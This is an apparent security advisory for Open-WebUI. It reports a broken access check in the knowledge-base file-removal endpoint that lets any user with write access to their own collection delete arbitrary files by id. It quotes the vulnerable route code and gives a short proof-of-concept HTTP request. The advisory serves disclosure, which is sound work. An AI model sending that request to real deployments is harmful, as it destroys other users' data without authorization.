PT-2026-59338 · Pypi · Open-Webui

Published

2026-07-13

·

Updated

2026-07-13

CVSS v3.1

5.4

Medium

VectorAV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L

Summary

An access control check is missing when deleting a file from a knowledge base. The only check being done is that the user has write access to the knowledge base (or is admin), but NOT that the file actually belongs to this knowledge base. It is thus possible to delete arbitrary files from arbitrary knowledge bases (as long as one knows the file id)

Details

The source code at https://github.com/open-webui/open-webui/blob/main/backend/open webui/routers/knowledge.py#L803 does not properly validate that the file being deleted belongs to the current knowledge base:
@router.post("/{id}/file/remove", response model=Optional[KnowledgeFilesResponse])
def remove file from knowledge by id(
  id: str,
  form data: KnowledgeFileIdForm,
  delete file: bool = Query(True),
  user=Depends(get verified user),
  db: Session = Depends(get session),
):
  knowledge = Knowledges.get knowledge by id(id=id, db=db)
  [...]
  # Note : Access control check on the knowledge base
  if (
    knowledge.user id != user.id
    and not AccessGrants.has access(
      user id=user.id,
      resource type="knowledge",
      resource id=knowledge.id,
      permission="write",
      db=db,
    )
    and user.role != "admin"
  ):
    raise HTTPException(
      status code=status.HTTP 400 BAD REQUEST,
      detail=ERROR MESSAGES.ACCESS PROHIBITED,
    )

  file = Files.get file by id(form data.file id, db=db)
  [...]
  # Note : No checks on the file

  if delete file:
    try:
      # Remove the file's collection from vector database
      file collection = f"file-{form data.file id}"
      if VECTOR DB CLIENT.has collection(collection name=file collection):
        VECTOR DB CLIENT.delete collection(collection name=file collection)
    except Exception as e:
      log.debug("This was most likely caused by bypassing embedding processing")
      log.debug(e)
      pass

    # Delete file from database
    Files.delete file by id(form data.file id, db=db)
[...]

PoC

Victim has a knowledge base with a file (id: 9db6dcee-bb3b-483e-aaf3-310fda366af1) Attacker creates their own collection (id: dde9e2b6-21c9-4aa1-a1cf-8cb0e4392f2b) Attacker deletes the victim file from their own collection:
POST /api/v1/knowledge/dde9e2b6-21c9-4aa1-a1cf-8cb0e4392f2b/file/remove HTTP/1.1
Host: gaius-neo-val.fr.space.corp
Authorization: Bearer eyJhbGciOiJIUzI1[...]nHiaod-3vfNE0
[...]

{"file id":"9db6dcee-bb3b-483e-aaf3-310fda366af1"}

-----

HTTP/1.1 200 OK
[...]
The file is then deleted from the victim's knowledge base.

Impact

Arbitrary file deletion

Fix

Found an issue in the description? Have something to add? Feel free to write us 👾

Related Identifiers

PYSEC-2026-2693

Affected Products

Open-Webui